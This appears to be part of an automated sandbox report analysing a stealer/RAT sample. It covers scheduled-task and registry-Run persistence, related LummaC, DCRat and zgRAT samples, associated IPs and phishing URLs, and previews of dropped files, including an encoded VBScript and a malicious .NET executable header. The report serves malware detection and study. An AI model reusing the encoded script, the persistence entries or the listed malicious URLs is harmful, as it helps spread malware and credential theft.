                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • Execution Graph export aborted for target Idle.exe, PID 8044 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target Idle.exe, PID 8056 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target msedge.exe, PID 1056 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target msedge.exe, PID 7576 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target msedge.exe, PID 8064 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target msedge.exe, PID 8096 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7932 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7944 because it is empty
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                      • VT rate limit hit for: NCTSgL4t0B.exe
                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      12:33:34API Interceptor4x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                      14:24:41API Interceptor55x Sleep call for process: powershell.exe modified
                                                                                                                                                                                      14:24:52API Interceptor2x Sleep call for process: msedge.exe modified
                                                                                                                                                                                      14:24:55API Interceptor1x Sleep call for process: Idle.exe modified
                                                                                                                                                                                      20:24:40Task SchedulerRun new task: Idle path: "C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                      20:24:40Task SchedulerRun new task: IdleI path: "C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                      20:24:40Task SchedulerRun new task: msedge path: "C:\Edge\msedge.exe"
                                                                                                                                                                                      20:24:40Task SchedulerRun new task: msedgem path: "C:\Edge\msedge.exe"
                                                                                                                                                                                      20:24:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                      20:24:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                                      20:24:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                      20:25:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                                      20:25:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                      20:25:25AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                                      20:25:41AutostartRun: WinLogon Shell "C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                      20:25:49AutostartRun: WinLogon Shell "C:\Edge\msedge.exe"
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      172.67.197.40UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        188.114.96.3docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                        • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                                                        https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                                                        http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                                                        http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                                                        http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                        • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                                                        ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                        • www.chinaen.org/zi4g/
                                                                                                                                                                                        http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                                                                                                                                                                        Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • www.444317.com/
                                                                                                                                                                                        Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                        • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                                                                                                                                                        1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                        • dddotx.shop/Mine/PWS/fre.php
                                                                                                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        steamcommunity.com4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        offeviablwke.site4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.21.84.213
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        file.garden4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        CLOUDFLARENETUS4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.21.84.213
                                                                                                                                                                                        https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.21.1.169
                                                                                                                                                                                        4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.18.35.212
                                                                                                                                                                                        https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                        https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                        CLOUDFLARENETUS4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.21.84.213
                                                                                                                                                                                        https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.21.1.169
                                                                                                                                                                                        4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.18.35.212
                                                                                                                                                                                        https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                        https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                        AKAMAI-ASUS4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.102.35.2
                                                                                                                                                                                        http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 173.223.116.167
                                                                                                                                                                                        Xkci1BfrmX.lnkGet hashmaliciousLonePageBrowse
                                                                                                                                                                                        • 23.56.162.185
                                                                                                                                                                                        Snc2ZNvAZP.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 23.56.162.185
                                                                                                                                                                                        Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 23.56.162.185
                                                                                                                                                                                        SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 96.17.64.189
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        74954a0c86284d0d6e1c4efefe92b521TJWbSGBK0I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        Cr4745ElZg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        Setup_10024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e14tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        • 172.67.197.40
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        C:\Edge\msedge.exepovqqKBcoP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                          4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                              gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Idle.exepovqqKBcoP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                    4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                      UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (461), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):461
                                                                                                                                                                                                            Entropy (8bit):5.816240753615295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:MfPXcR5jBlFeDHdNx0per7jlURYTKiZCUTRSrQnmW8CsCXhRj3rwVHYVZ5MmBiPe:MfWrl2Hp0Mr72s4sOCXhtrwOZDSs00
                                                                                                                                                                                                            MD5:5347B05E72ACEDE530ACFE1AE401967A
                                                                                                                                                                                                            SHA1:E677BC8260091A3E620AE136212DBB582F161FBA
                                                                                                                                                                                                            SHA-256:D2D7A6C660E24FCB481E20AE8803519D1564148BEE2B9F4C4BC1E41922261C82
                                                                                                                                                                                                            SHA-512:C2380FC45FB9998AFDE7E0A21AFA7C35B7D0FCDAED87F1AF6F3563E0BFB0E2E1CF541E91EC0BB48E75AE29CC840DBC0D18C3CFD5B40A40C8B663C1DAC057AB1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:fS33RViXlp95Y2OIhlZj2BPpjdF4opH2LxpCeLVPpGxY9MMAtCHVPqjeDNUyQnt5hGtlMMnVQK3wN0qXQFLliwmfNL8Q1g9CW202ckxhZwEFwwQNh6iKcIXveOYBNXdtL1aU9x4pRoMvshtb4vs48yjOeFXOMwTBTU44V6OuC23x6mD7e6GboivWRM03ZqcfVKcXmzF8h82F5wS2CatPp1XujhmJFUUVaXcvJpUp1I4pqpbf47196M0dxsyFM52MogphUgsXFEYg7rD3GGPIdUZNg98b0Pc5PrBJ93LXOd31yTfFo58GqutTHcBUhRh0mcQPp44N5139bhYNd3w4QWPf8rCh20066CPVDPZuBvKy1t1jDx1oemjPNvR81WVFB6DYRDKNdC3fMbnP0cdE9McUc9IR8b2oaEw5pdR9nnKcsEDwHBHY3QGzet6S52PCJPFHosjWLdaWB
                                                                                                                                                                                                            Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):229
                                                                                                                                                                                                            Entropy (8bit):5.838240404374592
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
                                                                                                                                                                                                            MD5:569A28CF34F3A51DB0CC4AA0369773EC
                                                                                                                                                                                                            SHA1:23488377EA3A37B61750952D541B867AB3D8B424
                                                                                                                                                                                                            SHA-256:86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
                                                                                                                                                                                                            SHA-512:3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.
                                                                                                                                                                                                            Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                            Entropy (8bit):4.968079981014333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
                                                                                                                                                                                                            MD5:68B1414DBD5A51F2F75912513D1A035E
                                                                                                                                                                                                            SHA1:A45E03F8EDADA7FDF3697EAA6D88785CD464D373
                                                                                                                                                                                                            SHA-256:48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
                                                                                                                                                                                                            SHA-512:AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%
                                                                                                                                                                                                            Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1963008
                                                                                                                                                                                                            Entropy (8bit):7.552676792704024
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                                                            MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                                                            SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                                                            SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: povqqKBcoP.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: 4tXm5yPtiy.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: gh3zRWl4or.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: seoI30IZZr.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1168
                                                                                                                                                                                                            Entropy (8bit):4.448520842480604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                                                                                                            MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                                                                                                            SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                                                                                                            SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
